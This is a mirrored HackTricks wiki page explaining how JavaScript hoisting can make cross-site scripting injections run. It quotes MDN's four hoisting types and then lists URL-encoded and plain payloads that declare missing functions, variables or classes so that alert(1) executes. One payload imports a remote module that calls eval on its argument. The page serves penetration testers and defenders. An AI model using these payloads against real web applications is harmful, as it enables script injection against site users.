mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
158 lines
8.9 KiB
Markdown
158 lines
8.9 KiB
Markdown
|
# JS Hoisting
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|||
|
|
|||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
|||
|
|
|||
|
</details>
|
|||
|
|
|||
|
## Basic Information
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
JavaScript Hoisting refers to the process whereby the **interpreter appears to move the declaration** of functions, variables, classes, or imports to the **top of their scope, prior to execution of the code**.
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
JavaScript engine will do (at least two) passes over any script. This is a big simplification, but we can think of JS execution as consisting of two steps. **First, the code is parsed**, which includes checking for **syntax errors** and converting it to an abstract syntax tree. This step also includes what we describe as **hoisting,** where certain forms of declarations are “moved”(hoisted) to the top of the execution stack. If the code passes the parsing step, the engine **continues to execute the script**.
|
|||
|
|
|||
|
1. Any code (including the injected payload) must adhere to the syntax rules. **Nothing will execute if the syntax is invalid** anywhere in the final script.
|
|||
|
2. Where in a script code is placed might have importance, but **the text representation of a code snippet is not the same as what is executed** by the runtime in the end. Any language might have rules that decide what order expressions are executed.
|
|||
|
|
|||
|
### The four types of hoisting
|
|||
|
|
|||
|
Returning to MDN’s description of hoisting, we can read that there are four kinds of hoisting in JavaScript. Again, directly from MDN:
|
|||
|
|
|||
|
> 1. Being able to use a variable’s value in its scope before the line it is declared. (“Value hoisting”)
|
|||
|
> 2. Being able to reference a variable in its scope before the line it is declared, without throwing a `ReferenceError`, but the value is always `undefined`. (“Declaration hoisting”)
|
|||
|
> 3. The declaration of the variable causes behavior changes in its scope before the line in which it is declared.
|
|||
|
> 4. The side effects of a declaration are produced before evaluating the rest of the code that contains it.
|
|||
|
|
|||
|
followed by
|
|||
|
|
|||
|
> The four function declarations above are hoisted with type 1 behavior; `var` declaration is hoisted with type 2 behavior; [`let`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/let), [`const`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/const), and [`class`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/class) declarations (also collectively called _lexical declarations_) are hoisted with type 3 behavior; [`import`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import) declarations are hoisted with type 1 and type 4 behavior.
|
|||
|
|
|||
|
## Scenarios
|
|||
|
|
|||
|
Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error):
|
|||
|
|
|||
|
```javascript
|
|||
|
// The function vulnerableFunction is not defined
|
|||
|
vulnerableFunction('test', '<INJECTION>');
|
|||
|
// You can define it in your injection to execute JS
|
|||
|
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
|
|||
|
'-alert(1)-''); function vulnerableFunction(a,b){return 1};
|
|||
|
|
|||
|
//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
|
|||
|
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
|
|||
|
```
|
|||
|
|
|||
|
```javascript
|
|||
|
// If a variable is not defined, you could define it in the injection
|
|||
|
// In the following example var a is not defined
|
|||
|
function myFunction(a,b){
|
|||
|
return 1
|
|||
|
};
|
|||
|
myFunction(a, '<INJECTION>')
|
|||
|
|
|||
|
//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
|
|||
|
test'); var a = 1; alert(1);
|
|||
|
```
|
|||
|
|
|||
|
```javascript
|
|||
|
// If an undeclared class is used, you cannot declare it AFTER being used
|
|||
|
var variable = new unexploitableClass();
|
|||
|
<INJECTION>
|
|||
|
// But you can actually declare it as a function, being able to fix the syntax with something like:
|
|||
|
function unexploitableClass() {
|
|||
|
return 1;
|
|||
|
}
|
|||
|
alert(1);
|
|||
|
```
|
|||
|
|
|||
|
```javascript
|
|||
|
// Properties are not hoisted
|
|||
|
// So the following examples where the 'cookie' attribute doesn´t exist
|
|||
|
// cannot be fixed if you can only inject after that code:
|
|||
|
test.cookie('leo','INJECTION')
|
|||
|
test['cookie','injection']
|
|||
|
```
|
|||
|
|
|||
|
## More Scenarios
|
|||
|
|
|||
|
```javascript
|
|||
|
// Undeclared var accessing to an undeclared method
|
|||
|
x.y(1,INJECTION)
|
|||
|
// You can inject
|
|||
|
alert(1));function x(){}//
|
|||
|
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
|
|||
|
x.y(1,alert(1));function x(){}//)
|
|||
|
```
|
|||
|
|
|||
|
```javascript
|
|||
|
// Undeclared var accessing 2 nested undeclared method
|
|||
|
x.y.z(1,INJECTION)
|
|||
|
// You can inject
|
|||
|
");import {x} from "https://example.com/module.js"//
|
|||
|
// It will be executed
|
|||
|
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
|
|||
|
|
|||
|
|
|||
|
// The imported module:
|
|||
|
// module.js
|
|||
|
var x = {
|
|||
|
y: {
|
|||
|
z: function(param) {
|
|||
|
eval(param);
|
|||
|
}
|
|||
|
}
|
|||
|
};
|
|||
|
|
|||
|
export { x };
|
|||
|
```
|
|||
|
|
|||
|
```javascript
|
|||
|
// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
|
|||
|
// It was injected the: let config;`-alert(1)`//`
|
|||
|
// With the goal of making in the block the var config be empty, so the return is not executed
|
|||
|
// And the same injection was replicated in the body URL to execute an alert
|
|||
|
|
|||
|
try {
|
|||
|
if(config){
|
|||
|
return;
|
|||
|
}
|
|||
|
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
|
|||
|
let config;`-alert(1)`//`+"
|
|||
|
} catch {
|
|||
|
fetch("/error", {
|
|||
|
method: "POST",
|
|||
|
body: {
|
|||
|
url:"https://try-to-catch.glitch.me/"+`
|
|||
|
let config;`-alert(1)-`//`+""
|
|||
|
}
|
|||
|
})
|
|||
|
}
|
|||
|
```
|
|||
|
|
|||
|
## References
|
|||
|
|
|||
|
* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
|
|||
|
* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
|
|||
|
* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|||
|
|
|||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
|||
|
|
|||
|
</details>
|